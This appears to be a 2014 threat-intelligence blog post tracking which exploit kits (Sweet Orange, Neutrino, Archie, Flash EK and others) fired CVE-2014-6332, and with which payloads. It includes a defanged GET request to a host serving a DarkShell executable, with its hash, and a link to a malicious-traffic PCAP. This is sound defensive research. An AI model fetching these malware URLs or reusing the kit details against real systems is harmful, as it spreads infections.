For this CVE referer to :
The first encounter I had with this CVE in exploit kit, was in the Sweet Orange from the actor pushing DarkShell via KR compromised website. The landing provided by @MalwareSigs the 2014-11-19 was already containing CVE-2014-6332
So this actor :
|DarkShell pushed by |
The actor pushing DarkShell with GongDa via KR compromised websites has migrated to Sweet Orange.Somewhat unexpected. pic.twitter.com/rlMy5RsevJ
— kafeine (@kafeine) October 25, 2014
Sweet Orange :
The URL pattern are different, but at a given time the modifications are similar on both...
|Da Orangade firing CVE-2014-6332 and DarkShell Call back |
200 OK (text/html)
|Sweet Orange Landing|
A replace then a b64decode on the second b64 blob and we have :
|CVE-2014-6332 in Sweet Orange|
GET http://v.krtedun .com/sum.exe - DarkShell - fc1a3c9fc7a80e80109f1e2a32e2b057
200 OK (application/octet-stream)
Here a more "standard" Sweet Orange :
|CVE-2014-6332 fired by Sweet Orange - And Betabot call back.|
File : You'll find a PCAP illustrating this here
http://www.threatglass.com/malicious_urls/volumebass-com-2014-11-21 (in this pcap the CVE-2014-6332 is in the first b64 blob)
|Neutrino Firing CVE-2014-6332 embedded in a flash|
Please refer to this post : Neutrino : The come back !
First spotted by Will Metcalf, here CVE-2014-6332 in Archie
|CVE-2014-6332 - 2014-11-24|
|Flash EK firing CVE-2014-6332 - 2014-12-13|
Edit : 2014-12-21 - Kaspersky named what we were calling Andromedins or AndroKins : Chthonic
NB : it's in RIG and Angler (2015-01-30 for last one).
Will update asap.
Read More :
Neutrino : The come back ! - 2014-11-20